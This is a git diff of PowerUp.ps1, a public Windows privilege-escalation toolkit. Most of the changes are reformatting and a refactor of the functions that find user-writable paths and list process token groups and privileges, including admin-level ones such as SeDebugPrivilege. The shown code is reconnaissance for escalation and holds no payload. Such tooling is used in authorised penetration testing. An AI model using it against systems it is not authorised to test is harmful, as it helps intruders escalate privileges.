+            Write-Error "[Get-System] Script must be run as administrator" -ErrorAction Stop
         }
 
         if($Technique -eq 'NamedPipe') {
diff --git a/Privesc/PowerUp.ps1 b/Privesc/PowerUp.ps1
index 072b03e..50f8268 100644
--- a/Privesc/PowerUp.ps1
+++ b/Privesc/PowerUp.ps1
@@ -1,11 +1,13 @@
 <#
-    PowerUp aims to be a clearinghouse of common Windows privilege escalation
-    vectors that rely on misconfigurations. See README.md for more information.
 
-    Author: @harmj0y
-    License: BSD 3-Clause
-    Required Dependencies: None
-    Optional Dependencies: None
+PowerUp aims to be a clearinghouse of common Windows privilege escalation
+vectors that rely on misconfigurations. See README.md for more information.
+
+Author: @harmj0y
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
 #>
 
 #Requires -Version 2
@@ -19,8 +21,7 @@
 #
 ########################################################
 
-function New-InMemoryModule
-{
+function New-InMemoryModule {
 <#
 .SYNOPSIS
 
@@ -48,8 +49,9 @@ ModuleName is not provided, it will default to a GUID.
 $Module = New-InMemoryModule -ModuleName Win32
 #>
 
-    Param
-    (
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
+    [CmdletBinding()]
+    Param (
         [Parameter(Position = 0)]
         [ValidateNotNullOrEmpty()]
         [String]
@@ -76,19 +78,17 @@ $Module = New-InMemoryModule -ModuleName Win32
 
 # A helper function used to reduce typing while defining function
 # prototypes for Add-Win32Type.
-function func
-{
-    Param
-    (
-        [Parameter(Position = 0, Mandatory=$True)]
+function func {
+    Param (
+        [Parameter(Position = 0, Mandatory = $True)]
         [String]
         $DllName,
 
-        [Parameter(Position = 1, Mandatory=$True)]
+        [Parameter(Position = 1, Mandatory = $True)]
         [string]
         $FunctionName,
 
-        [Parameter(Position = 2, Mandatory=$True)]
+        [Parameter(Position = 2, Mandatory = $True)]
         [Type]
         $ReturnType,
 
@@ -363,8 +363,7 @@ are all incorporated into the same in-memory module.
 }
 
 
-function psenum
-{
+function psenum {
 <#
 .SYNOPSIS
 
@@ -431,8 +430,7 @@ New-Enum. :P
 #>
 
     [OutputType([Type])]
-    Param
-    (
+    Param (
         [Parameter(Position = 0, Mandatory=$True)]
         [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})]
         $Module,
@@ -483,10 +481,8 @@ New-Enum. :P
 
 # A helper function used to reduce typing while defining struct
 # fields.
-function field
-{
-    Param
-    (
+function field {
+    Param (
         [Parameter(Position = 0, Mandatory=$True)]
         [UInt16]
         $Position,
@@ -608,8 +604,7 @@ New-Struct. :P
 #>
 
     [OutputType([Type])]
-    Param
-    (
+    Param (
         [Parameter(Position = 1, Mandatory=$True)]
         [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})]
         $Module,
@@ -741,67 +736,75 @@ New-Struct. :P
 
 function Get-ModifiablePath {
 <#
-    .SYNOPSIS
+.SYNOPSIS
 
-        Parses a passed string containing multiple possible file/folder paths and returns
-        the file paths where the current user has modification rights.
+Parses a passed string containing multiple possible file/folder paths and returns
+the file paths where the current user has modification rights.
 
-        Author: @harmj0y
-        License: BSD 3-Clause
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: None  
 
-    .DESCRIPTION
+.DESCRIPTION
 
-        Takes a complex path specification of an initial file/folder path with possible
-        configuration files, 'tokenizes' the string in a number of possible ways, and
-        enumerates the ACLs for each path that currently exists on the system. Any path that
-        the current user has modification rights on is returned in a custom object that contains
-        the modifiable path, associated permission set, and the IdentityReference with the specified
-        rights. The SID of the current user and any group he/she are a part of are used as the
-        comparison set against the parsed path DACLs.
+Takes a complex path specification of an initial file/folder path with possible
+configuration files, 'tokenizes' the string in a number of possible ways, and
+enumerates the ACLs for each path that currently exists on the system. Any path that
+the current user has modification rights on is returned in a custom object that contains
+the modifiable path, associated permission set, and the IdentityReference with the specified
+rights. The SID of the current user and any group he/she are a part of are used as the
+comparison set against the parsed path DACLs.
 
-    .PARAMETER Path
+.PARAMETER Path
 
-        The string path to parse for modifiable files. Required
+The string path to parse for modifiable files. Required
 
-    .PARAMETER LiteralPaths
+.PARAMETER Literal
 
-        Switch. Treat all paths as literal (i.e. don't do 'tokenization').
+Switch. Treat all paths as literal (i.e. don't do 'tokenization').
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> '"C:\Temp\blah.exe" -f "C:\Temp\config.ini"' | Get-ModifiablePath
+'"C:\Temp\blah.exe" -f "C:\Temp\config.ini"' | Get-ModifiablePath
 
-        Path                       Permissions                IdentityReference
-        ----                       -----------                -----------------
-        C:\Temp\blah.exe           {ReadAttributes, ReadCo... NT AUTHORITY\Authentic...
-        C:\Temp\config.ini         {ReadAttributes, ReadCo... NT AUTHORITY\Authentic...
+Path                       Permissions                IdentityReference
+----                       -----------                -----------------
+C:\Temp\blah.exe           {ReadAttributes, ReadCo... NT AUTHORITY\Authentic...
+C:\Temp\config.ini         {ReadAttributes, ReadCo... NT AUTHORITY\Authentic...
 
-    .EXAMPLE
+.EXAMPLE
+
+Get-ChildItem C:\Vuln\ -Recurse | Get-ModifiablePath
+
+Path                       Permissions                IdentityReference
+----                       -----------                -----------------
+C:\Vuln\blah.bat           {ReadAttributes, ReadCo... NT AUTHORITY\Authentic...
+C:\Vuln\config.ini         {ReadAttributes, ReadCo... NT AUTHORITY\Authentic...
+...
 
-        PS C:\> Get-ChildItem C:\Vuln\ -Recurse | Get-ModifiablePath
+.OUTPUTS
 
-        Path                       Permissions                IdentityReference
-        ----                       -----------                -----------------
-        C:\Vuln\blah.bat           {ReadAttributes, ReadCo... NT AUTHORITY\Authentic...
-        C:\Vuln\config.ini         {ReadAttributes, ReadCo... NT AUTHORITY\Authentic...
-        ...
+PowerUp.TokenPrivilege.ModifiablePath
+
+Custom PSObject containing the Permissions, ModifiablePath, IdentityReference for
+a modifiable path.
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerUp.ModifiablePath')]
     [CmdletBinding()]
     Param(
-        [Parameter(Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)]
+        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
         [Alias('FullName')]
         [String[]]
         $Path,
 
+        [Alias('LiteralPaths')]
         [Switch]
-        $LiteralPaths
+        $Literal
     )
 
     BEGIN {
-        # # false positives ?
-        # $Excludes = @("MsMpEng.exe", "NisSrv.exe")
-
         # from http://stackoverflow.com/questions/28029872/retrieving-security-descriptor-and-getting-number-for-filesystemrights
         $AccessMask = @{
             [uint32]'0x80000000' = 'GenericRead'
@@ -829,7 +832,6 @@ function Get-ModifiablePath {
         $UserIdentity = [System.Security.Principal.WindowsIdentity]::GetCurrent()
         $CurrentUserSids = $UserIdentity.Groups | Select-Object -ExpandProperty Value
         $CurrentUserSids += $UserIdentity.User.Value
-
         $TranslatedIdentityReferences = @{}
     }
 
@@ -842,23 +844,18 @@ function Get-ModifiablePath {
             # possible separator character combinations
             $SeparationCharacterSets = @('"', "'", ' ', "`"'", '" ', "' ", "`"' ")
 
-            if($PSBoundParameters['LiteralPaths']) {
+            if ($PSBoundParameters['Literal']) {
 
                 $TempPath = $([System.Environment]::ExpandEnvironmentVariables($TargetPath))
 
-                if(Test-Path -Path $TempPath -ErrorAction SilentlyContinue) {
+                if (Test-Path -Path $TempPath -ErrorAction SilentlyContinue) {
                     $CandidatePaths += Resolve-Path -Path $TempPath | Select-Object -ExpandProperty Path
                 }
                 else {
                     # if the path doesn't exist, check if the parent folder allows for modification
-                    try {
-                        $ParentPath = Split-Path $TempPath -Parent
-                        if($ParentPath -and (Test-Path -Path $ParentPath)) {
-                            $CandidatePaths += Resolve-Path -Path $ParentPath -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path
-                        }
-                    }
-                    catch {
-                        # because Split-Path doesn't handle -ErrorAction SilentlyContinue nicely
+                    $ParentPath = Split-Path -Path $TempPath -Parent  -ErrorAction SilentlyContinue
+                    if ($ParentPath -and (Test-Path -Path $ParentPath)) {
+                        $CandidatePaths += Resolve-Path -Path $ParentPath -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path
                     }
                 }
             }
@@ -866,26 +863,21 @@ function Get-ModifiablePath {
                 ForEach($SeparationCharacterSet in $SeparationCharacterSets) {
                     $TargetPath.Split($SeparationCharacterSet) | Where-Object {$_ -and ($_.trim() -ne '')} | ForEach-Object {
 
-                        if(($SeparationCharacterSet -notmatch ' ')) {
+                        if (($SeparationCharacterSet -notmatch ' ')) {
 
                             $TempPath = $([System.Environment]::ExpandEnvironmentVariables($_)).Trim()
 
-                            if($TempPath -and ($TempPath -ne '')) {
-                                if(Test-Path -Path $TempPath -ErrorAction SilentlyContinue) {
+                            if ($TempPath -and ($TempPath -ne '')) {
+                                if (Test-Path -Path $TempPath -ErrorAction SilentlyContinue) {
                                     # if the path exists, resolve it and add it to the candidate list
                                     $CandidatePaths += Resolve-Path -Path $TempPath | Select-Object -ExpandProperty Path
                                 }
 
                                 else {
                                     # if the path doesn't exist, check if the parent folder allows for modification
-                                    try {
-                                        $ParentPath = (Split-Path -Path $TempPath -Parent).Trim()
-                                        if($ParentPath -and ($ParentPath -ne '') -and (Test-Path -Path $ParentPath )) {
-                                            $CandidatePaths += Resolve-Path -Path $ParentPath | Select-Object -ExpandProperty Path
-                                        }
-                                    }
-                                    catch {
-                                        # trap because Split-Path doesn't handle -ErrorAction SilentlyContinue nicely
+                                    $ParentPath = (Split-Path -Path $TempPath -Parent -ErrorAction SilentlyContinue).Trim()
+                                    if ($ParentPath -and ($ParentPath -ne '') -and (Test-Path -Path $ParentPath  -ErrorAction SilentlyContinue)) {
+                                        $CandidatePaths += Resolve-Path -Path $ParentPath -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path
                                     }
                                 }
                             }
@@ -904,14 +896,14 @@ function Get-ModifiablePath {
 
                     $FileSystemRights = $_.FileSystemRights.value__
 
-                    $Permissions = $AccessMask.Keys | Where-Object { $FileSystemRights -band $_ } | ForEach-Object { $accessMask[$_] }
+                    $Permissions = $AccessMask.Keys | Where-Object { $FileSystemRights -band $_ } | ForEach-Object { $AccessMask[$_] }
 
                     # the set of permission types that allow for modification
                     $Comparison = Compare-Object -ReferenceObject $Permissions -DifferenceObject @('GenericWrite', 'GenericAll', 'MaximumAllowed', 'WriteOwner', 'WriteDAC', 'WriteData/AddFile', 'AppendData/AddSubdirectory') -IncludeEqual -ExcludeDifferent
 
-                    if($Comparison) {
+                    if ($Comparison) {
                         if ($_.IdentityReference -notmatch '^S-1-5.*') {
-                            if(-not ($TranslatedIdentityReferences[$_.IdentityReference])) {
+                            if (-not ($TranslatedIdentityReferences[$_.IdentityReference])) {
                                 # translate the IdentityReference if it's a username and not a SID
                                 $IdentityUser = New-Object System.Security.Principal.NTAccount($_.IdentityReference)
                                 $TranslatedIdentityReferences[$_.IdentityReference] = $IdentityUser.Translate([System.Security.Principal.SecurityIdentifier]) | Select-Object -ExpandProperty Value
@@ -922,12 +914,13 @@ function Get-ModifiablePath {
                             $IdentitySID = $_.IdentityReference
                         }
 
-                        if($CurrentUserSids -contains $IdentitySID) {
-                            New-Object -TypeName PSObject -Property @{
-                                ModifiablePath = $CandidatePath
-                                IdentityReference = $_.IdentityReference
-                                Permissions = $Permissions
-                            }
+                        if ($CurrentUserSids -contains $IdentitySID) {
+                            $Out = New-Object PSObject
+                            $Out | Add-Member Noteproperty 'ModifiablePath' $CandidatePath
+                            $Out | Add-Member Noteproperty 'IdentityReference' $_.IdentityReference
+                            $Out | Add-Member Noteproperty 'Permissions' $Permissions
+                            $Out.PSObject.TypeNames.Insert(0, 'PowerUp.ModifiablePath')
+                            $Out
                         }
                     }
                 }
@@ -937,127 +930,728 @@ function Get-ModifiablePath {
 }
 
 
-function Get-CurrentUserTokenGroupSid {
+function Get-TokenInformation {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Helpers that returns token groups or privileges for a passed process/thread token.
+Used by Get-ProcessTokenGroup and Get-ProcessTokenPrivilege.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: PSReflect  
+
+.DESCRIPTION
+
+Wraps the GetTokenInformation() Win 32API call to query the given token for
+either token groups (-InformationClass "Groups") or privileges (-InformationClass "Privileges").
+For token groups, group is iterated through and the SID structure is converted to a readable
+string using ConvertSidToStringSid(), and the unique list of SIDs the user is a part of
+(disabled or not) is returned as a string array.
+
+.PARAMETER TokenHandle
+
+The IntPtr token handle to query. Required.
+
+.PARAMETER InformationClass
+
+The type of information to query for the token handle, either 'Groups', 'Privileges', or 'Type'.
+
+.OUTPUTS
+
+PowerUp.TokenGroup
+
+Outputs a custom object containing the token group (SID/attributes) for the specified token if
+"-InformationClass 'Groups'" is passed.
 
-        Returns all SIDs that the current user is a part of, whether they are disabled or not.
+PowerUp.TokenPrivilege
 
-        Author: @harmj0y
-        License: BSD 3-Clause
+Outputs a custom object containing the token privilege (name/attributes) for the specified token if
+"-InformationClass 'Privileges'" is passed
 
-    .DESCRIPTION
+PowerUp.TokenType
 
-        First gets the current process handle using the GetCurrentProcess() Win32 API call and feeds
-        this to OpenProcessToken() to open up a handle to the current process token. The API call
-        GetTokenInformation() is then used to enumerate the TOKEN_GROUPS for the current process
-        token. Each group is iterated through and the SID structure is converted to a readable
-        string using ConvertSidToStringSid(), and the unique list of SIDs the user is a part of
-        (disabled or not) is returned as a string array.
+Outputs a custom object containing the token type and impersonation level for the specified token if
+"-InformationClass 'Type'" is passed
 
-    .LINK
+.LINK
 
-        https://msdn.microsoft.com/en-us/library/windows/desktop/aa446671(v=vs.85).aspx
-        https://msdn.microsoft.com/en-us/library/windows/desktop/aa379624(v=vs.85).aspx
-        https://msdn.microsoft.com/en-us/library/windows/desktop/aa379554(v=vs.85).aspx
+https://msdn.microsoft.com/en-us/library/windows/desktop/aa446671(v=vs.85).aspx
+https://msdn.microsoft.com/en-us/library/windows/desktop/aa379624(v=vs.85).aspx
+https://msdn.microsoft.com/en-us/library/windows/desktop/aa379554(v=vs.85).aspx
+https://msdn.microsoft.com/en-us/library/windows/desktop/aa379626(v=vs.85).aspx
+https://msdn.microsoft.com/en-us/library/windows/desktop/aa379630(v=vs.85).aspx
 #>
 
+    [OutputType('PowerUp.TokenGroup')]
+    [OutputType('PowerUp.TokenPrivilege')]
     [CmdletBinding()]
-    Param()
+    Param(
+        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True)]
+        [Alias('hToken', 'Token')]
+        [ValidateNotNullOrEmpty()]
+        [IntPtr]
+        $TokenHandle,
+
+        [String[]]
+        [ValidateSet('Groups', 'Privileges', 'Type')]
+        $InformationClass = 'Privileges'
+    )
+
+    PROCESS {
+        if ($InformationClass -eq 'Groups') {
+            # query the process token with the TOKEN_INFORMATION_CLASS = 2 enum to retrieve a TOKEN_GROUPS structure
+
+            # initial query to determine the necessary buffer size
+            $TokenGroupsPtrSize = 0
+            $Success = $Advapi32::GetTokenInformation($TokenHandle, 2, 0, $TokenGroupsPtrSize, [ref]$TokenGroupsPtrSize)
+            [IntPtr]$TokenGroupsPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenGroupsPtrSize)
+
+            $Success = $Advapi32::GetTokenInformation($TokenHandle, 2, $TokenGroupsPtr, $TokenGroupsPtrSize, [ref]$TokenGroupsPtrSize);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
+
+            if ($Success) {
+                $TokenGroups = $TokenGroupsPtr -as $TOKEN_GROUPS
+                For ($i=0; $i -lt $TokenGroups.GroupCount; $i++) {
+                    # convert each token group SID to a displayable string
+
+                    if ($TokenGroups.Groups[$i].SID) {
+                        $SidString = ''
+                        $Result = $Advapi32::ConvertSidToStringSid($TokenGroups.Groups[$i].SID, [ref]$SidString);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
+                        if ($Result -eq 0) {
+                            Write-Verbose "Error: $(([ComponentModel.Win32Exception] $LastError).Message)"
+                        }
+                        else {
+                            $GroupSid = New-Object PSObject
+                            $GroupSid | Add-Member Noteproperty 'SID' $SidString
+                            # cast the atttributes field as our SidAttributes enum
+                            $GroupSid | Add-Member Noteproperty 'Attributes' ($TokenGroups.Groups[$i].Attributes -as $SidAttributes)
+                            $GroupSid | Add-Member Noteproperty 'TokenHandle' $TokenHandle
+                            $GroupSid.PSObject.TypeNames.Insert(0, 'PowerUp.TokenGroup')
+                            $GroupSid
+                        }
+                    }
+                }
+            }
+            else {
+                Write-Warning ([ComponentModel.Win32Exception] $LastError)
+            }
+            [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenGroupsPtr)
+        }
+        elseif ($InformationClass -eq 'Privileges') {
+            # query the process token with the TOKEN_INFORMATION_CLASS = 3 enum to retrieve a TOKEN_PRIVILEGES structure
+
+            # initial query to determine the necessary buffer size
+            $TokenPrivilegesPtrSize = 0
+            $Success = $Advapi32::GetTokenInformation($TokenHandle, 3, 0, $TokenPrivilegesPtrSize, [ref]$TokenPrivilegesPtrSize)
+            [IntPtr]$TokenPrivilegesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivilegesPtrSize)
+
+            $Success = $Advapi32::GetTokenInformation($TokenHandle, 3, $TokenPrivilegesPtr, $TokenPrivilegesPtrSize, [ref]$TokenPrivilegesPtrSize);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
+
+            if ($Success) {
+                $TokenPrivileges = $TokenPrivilegesPtr -as $TOKEN_PRIVILEGES
+                For ($i=0; $i -lt $TokenPrivileges.PrivilegeCount; $i++) {
+                    $Privilege = New-Object PSObject
+                    $Privilege | Add-Member Noteproperty 'Privilege' $TokenPrivileges.Privileges[$i].Luid.LowPart.ToString()
+                    # cast the lower Luid field as our LuidAttributes enum
+                    $Privilege | Add-Member Noteproperty 'Attributes' ($TokenPrivileges.Privileges[$i].Attributes -as $LuidAttributes)
+                    $Privilege | Add-Member Noteproperty 'TokenHandle' $TokenHandle
+                    $Privilege.PSObject.TypeNames.Insert(0, 'PowerUp.TokenPrivilege')
+                    $Privilege
+                }
+            }
+            else {
+                Write-Warning ([ComponentModel.Win32Exception] $LastError)
+            }
+            [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesPtr)
+        }
+        else {
+            $TokenResult = New-Object PSObject
+
+            # query the process token with the TOKEN_INFORMATION_CLASS = 8 enum to retrieve a TOKEN_TYPE enum
+
+            # initial query to determine the necessary buffer size
+            $TokenTypePtrSize = 0
+            $Success = $Advapi32::GetTokenInformation($TokenHandle, 8, 0, $TokenTypePtrSize, [ref]$TokenTypePtrSize)
+            [IntPtr]$TokenTypePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenTypePtrSize)
+
+            $Success = $Advapi32::GetTokenInformation($TokenHandle, 8, $TokenTypePtr, $TokenTypePtrSize, [ref]$TokenTypePtrSize);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
+
+            if ($Success) {
+                $Temp = $TokenTypePtr -as $TOKEN_TYPE
+                $TokenResult | Add-Member Noteproperty 'Type' $Temp.Type
+            }
+            else {
+                Write-Warning ([ComponentModel.Win32Exception] $LastError)
+            }
+            [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenTypePtr)
+
+            # now query the process token with the TOKEN_INFORMATION_CLASS = 8 enum to retrieve a SECURITY_IMPERSONATION_LEVEL enum
+
+            # initial query to determine the necessary buffer size
+            $TokenImpersonationLevelPtrSize = 0
+            $Success = $Advapi32::GetTokenInformation($TokenHandle, 8, 0, $TokenImpersonationLevelPtrSize, [ref]$TokenImpersonationLevelPtrSize)
+            [IntPtr]$TokenImpersonationLevelPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenImpersonationLevelPtrSize)
+
+            $Success2 = $Advapi32::GetTokenInformation($TokenHandle, 8, $TokenImpersonationLevelPtr, $TokenImpersonationLevelPtrSize, [ref]$TokenImpersonationLevelPtrSize);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
+
+            if ($Success2) {
+                $Temp = $TokenImpersonationLevelPtr -as $IMPERSONATION_LEVEL
+                $TokenResult | Add-Member Noteproperty 'ImpersonationLevel' $Temp.ImpersonationLevel
+                $TokenResult | Add-Member Noteproperty 'TokenHandle' $TokenHandle
+                $TokenResult.PSObject.TypeNames.Insert(0, 'PowerUp.TokenType')
+                $TokenResult
+            }
+            else {
+                Write-Warning ([ComponentModel.Win32Exception] $LastError)
+            }
+            [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenImpersonationLevelPtr)
+        }
+    }
+}
+
+
+function Get-ProcessTokenGroup {
+<#
+.SYNOPSIS
+
+Returns all SIDs that the current token context is a part of, whether they are disabled or not.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: PSReflect, Get-TokenInformation  
+
+.DESCRIPTION
+
+First, if a process ID is passed, then the process is opened using OpenProcess(),
+otherwise GetCurrentProcess() is used to open up a pseudohandle to the current process.
+OpenProcessToken() is then used to get a handle to the specified process token. The token
+is then passed to Get-TokenInformation to query the current token groups for the specified
+token.
+
+.PARAMETER Id
+
+The process ID to enumerate token groups for, otherwise defaults to the current process.
+
+.EXAMPLE
+
+Get-ProcessTokenGroup
+
+SID                          Attributes         TokenHandle           ProcessId
+---                          ----------         -----------           ---------
+S-1-5-21-8901718... ...SE_GROUP_ENABLED                1616                3684
+S-1-1-0             ...SE_GROUP_ENABLED                1616                3684
+S-1-5-32-544        ..., SE_GROUP_OWNER                1616                3684
+S-1-5-32-545        ...SE_GROUP_ENABLED                1616                3684
+S-1-5-4             ...SE_GROUP_ENABLED                1616                3684
+S-1-2-1             ...SE_GROUP_ENABLED                1616                3684
+S-1-5-11            ...SE_GROUP_ENABLED                1616                3684
+S-1-5-15            ...SE_GROUP_ENABLED                1616                3684
+S-1-5-5-0-1053459   ...NTEGRITY_ENABLED                1616                3684
+S-1-2-0             ...SE_GROUP_ENABLED                1616                3684
+S-1-18-1            ...SE_GROUP_ENABLED                1616                3684
+S-1-16-12288                                           1616                3684
 
-    $CurrentProcess = $Kernel32::GetCurrentProcess()
+.EXAMPLE
 
-    $TOKEN_QUERY= 0x0008
+Get-Process notepad | Get-ProcessTokenGroup
 
-    # open up a pseudo handle to the current process- don't need to worry about closing
-    [IntPtr]$hProcToken = [IntPtr]::Zero
-    $Success = $Advapi32::OpenProcessToken($CurrentProcess, $TOKEN_QUERY, [ref]$hProcToken);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
+SID                          Attributes         TokenHandle           ProcessId
+---                          ----------         -----------           ---------
+S-1-5-21-8901718... ...SE_GROUP_ENABLED                1892                2044
+S-1-1-0             ...SE_GROUP_ENABLED                1892                2044
+S-1-5-32-544        ...SE_FOR_DENY_ONLY                1892                2044
+S-1-5-32-545        ...SE_GROUP_ENABLED                1892                2044
+S-1-5-4             ...SE_GROUP_ENABLED                1892                2044
+S-1-2-1             ...SE_GROUP_ENABLED                1892                2044
+S-1-5-11            ...SE_GROUP_ENABLED                1892                2044
+S-1-5-15            ...SE_GROUP_ENABLED                1892                2044
+S-1-5-5-0-1053459   ...NTEGRITY_ENABLED                1892                2044
+S-1-2-0             ...SE_GROUP_ENABLED                1892                2044
+S-1-18-1            ...SE_GROUP_ENABLED                1892                2044
+S-1-16-8192                                            1892                2044
 
-    if($Success) {
-        $TokenGroupsPtrSize = 0
-        # Initial query to determine the necessary buffer size
-        $Success = $Advapi32::GetTokenInformation($hProcToken, 2, 0, $TokenGroupsPtrSize, [ref]$TokenGroupsPtrSize)
 
-        [IntPtr]$TokenGroupsPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenGroupsPtrSize)
+.OUTPUTS
 
-        # query the current process token with the 'TokenGroups=2' TOKEN_INFORMATION_CLASS enum to retrieve a TOKEN_GROUPS structure
-        $Success = $Advapi32::GetTokenInformation($hProcToken, 2, $TokenGroupsPtr, $TokenGroupsPtrSize, [ref]$TokenGroupsPtrSize);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
+PowerUp.TokenGroup
 
-        if($Success) {
+Outputs a custom object containing the token group (SID/attributes) for the specified process.
+#>
 
-            $TokenGroups = $TokenGroupsPtr -as $TOKEN_GROUPS
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerUp.TokenGroup')]
+    [CmdletBinding()]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('ProcessID')]
+        [UInt32]
+        [ValidateNotNullOrEmpty()]
+        $Id
+    )
 
-            For ($i=0; $i -lt $TokenGroups.GroupCount; $i++) {
-                # convert each token group SID to a displayable string
-                $SidString = ''
-                $Result = $Advapi32::ConvertSidToStringSid($TokenGroups.Groups[$i].SID, [ref]$SidString);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
-                if($Result -eq 0) {
-                    Write-Verbose "Error: $(([ComponentModel.Win32Exception] $LastError).Message)"
+    PROCESS {
+        if ($PSBoundParameters['Id']) {
+            $ProcessHandle = $Kernel32::OpenProcess(0x400, $False, $Id);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
+            if ($ProcessHandle -eq 0) {
+                Write-Warning ([ComponentModel.Win32Exception] $LastError)
+            }
+            else {
+                $ProcessID = $Id
+            }
+        }
+        else {
+            # open up a pseudo handle to the current process- don't need to worry about closing
+            $ProcessHandle = $Kernel32::GetCurrentProcess()
+            $ProcessID = $PID
+        }
+
+        if ($ProcessHandle) {
+            [IntPtr]$hProcToken = [IntPtr]::Zero
+            $TOKEN_QUERY = 0x0008
+            $Success = $Advapi32::OpenProcessToken($ProcessHandle, $TOKEN_QUERY, [ref]$hProcToken);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
+
+            if ($Success) {
+                $TokenGroups = Get-TokenInformation -TokenHandle $hProcToken -InformationClass 'Groups'
+                $TokenGroups | ForEach-Object {
+                    $_ | Add-Member Noteproperty 'ProcessId' $ProcessID
+                    $_
                 }
-                else {
-                    $GroupSid = New-Object PSObject
-                    $GroupSid | Add-Member Noteproperty 'SID' $SidString
-                    # cast the atttributes field as our SidAttributes enum
-                    $GroupSid | Add-Member Noteproperty 'Attributes' ($TokenGroups.Groups[$i].Attributes -as $SidAttributes)
-                    $GroupSid
+            }
+            else {
+                Write-Warning ([ComponentModel.Win32Exception] $LastError)
+            }
+
+            if ($PSBoundParameters['Id']) {
+                # close the handle if we used OpenProcess()
+                $Null = $Kernel32::CloseHandle($ProcessHandle)
+            }
+        }
+    }
+}
+
+
+function Get-ProcessTokenPrivilege {
+<#
+.SYNOPSIS
+
+Returns all privileges for the current (or specified) process ID.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: PSReflect, Get-TokenInformation  
+
+.DESCRIPTION
+
+First, if a process ID is passed, then the process is opened using OpenProcess(),
+otherwise GetCurrentProcess() is used to open up a pseudohandle to the current process.
+OpenProcessToken() is then used to get a handle to the specified process token. The token
+is then passed to Get-TokenInformation to query the current privileges for the specified
+token.
+
+.PARAMETER Id
+
+The process ID to enumerate token groups for, otherwise defaults to the current process.
+
+.PARAMETER Special
+
+Switch. Only return 'special' privileges, meaning admin-level privileges.
+These include SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeBackupPrivilege,
+SeRestorePrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeImpersonatePrivilege, SeTcbPrivilege.
+
+.EXAMPLE
+
+Get-ProcessTokenPrivilege | ft -a
+
+WARNING: 2 columns do not fit into the display and were removed.
+
+Privilege                                                            Attributes
+---------                                                            ----------
+SeUnsolicitedInputPrivilege                                            DISABLED
+SeTcbPrivilege                                                         DISABLED
+SeSecurityPrivilege                                                    DISABLED
+SeTakeOwnershipPrivilege                                               DISABLED
+SeLoadDriverPrivilege                                                  DISABLED
+SeSystemProfilePrivilege                                               DISABLED
+SeSystemtimePrivilege                                                  DISABLED
+SeProfileSingleProcessPrivilege                                        DISABLED
+SeIncreaseBasePriorityPrivilege                                        DISABLED
+SeCreatePagefilePrivilege                                              DISABLED
+SeBackupPrivilege                                                      DISABLED
+SeRestorePrivilege                                                     DISABLED
+SeShutdownPrivilege                                                    DISABLED
+SeDebugPrivilege                                           SE_PRIVILEGE_ENABLED
+SeSystemEnvironmentPrivilege                                           DISABLED
+SeChangeNotifyPrivilege         ...EGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
+SeRemoteShutdownPrivilege                                              DISABLED
+SeUndockPrivilege                                                      DISABLED
+SeManageVolumePrivilege                                                DISABLED
+SeImpersonatePrivilege          ...EGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
+SeCreateGlobalPrivilege         ...EGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
+SeIncreaseWorkingSetPrivilege                                          DISABLED
+SeTimeZonePrivilege                                                    DISABLED
+SeCreateSymbolicLinkPrivilege                                          DISABLED
+
+.EXAMPLE
+
+Get-ProcessTokenPrivilege -Special
+
+Privilege                    Attributes         TokenHandle           ProcessId
+---------                    ----------         -----------           ---------
+SeTcbPrivilege                 DISABLED                2268                3684
+SeSecurityPrivilege            DISABLED                2268                3684
+SeTakeOwnershipP...            DISABLED                2268                3684
+SeLoadDriverPriv...            DISABLED                2268                3684
+SeBackupPrivilege              DISABLED                2268                3684
+SeRestorePrivilege             DISABLED                2268                3684
